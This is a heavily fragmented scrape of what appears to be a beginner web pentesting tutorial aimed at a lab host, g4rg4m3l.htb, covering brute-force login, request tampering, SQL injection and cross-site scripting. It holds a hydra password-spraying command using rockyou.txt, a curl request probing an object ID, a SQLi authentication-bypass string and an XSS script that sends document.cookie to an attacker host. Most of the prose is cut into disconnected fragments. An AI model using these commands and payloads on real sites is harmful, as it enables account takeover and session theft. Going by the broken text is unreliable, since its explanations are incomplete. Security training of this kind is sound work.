Web Pentest
Web Pentest
4 website hacking
techniques (try these
on your next pentest)
Four beginner-friendly website
hacking techniques to try on your
next pentest (with live “follow-along”
examples)!
applications?
• SQLi
• XSS
home" disclaimer:
website security.
platform.
access.
good!
hydra -l admin -P
/usr/share/wordlists/rockyou.txt -f -
vV g4rg4m3l.htb http-post-form
"/login.php:username=^USER^&password=^
Use the:
was password123.
Go deeper
admin user.
lack of security.
method.
curl -X GET -d
"evil_plan_id=666f1081b50c"
http://g4rg4m3l.htb/evil_plans.php
Go deeper
• Web Requests.
• Web Attacks.
SQL Injection
Let's revisit the login section. For a simple
database.
authentication.
'1'=1”.
authentication method.
other tables.
Go deeper
• SQLMap Essentials.
Cross-site scripting
(XSS) / cookie theft
Cross-site scripting (XSS) attacks are a type
web application.
proper validation.
web applications.
users.
post, or a message.
tag.
img.src = 'http:/<attacker-
IPaddress>:666/steal-cookies.php?
cookie=' + document.cookie;</script>
Go deeper
• Introduction to Python 3.
Become a certified
website hacking
specialist
We have covered some common techniques
advanced levels:
• SQLi
• XSS
practice.
certification.
n' roll!
Latest News
B LU E TE AM I N G 5 MIN READ
Products
Solutions
Pricing
Resources
Company
Cookie Settings
Privacy Policy
User Agreement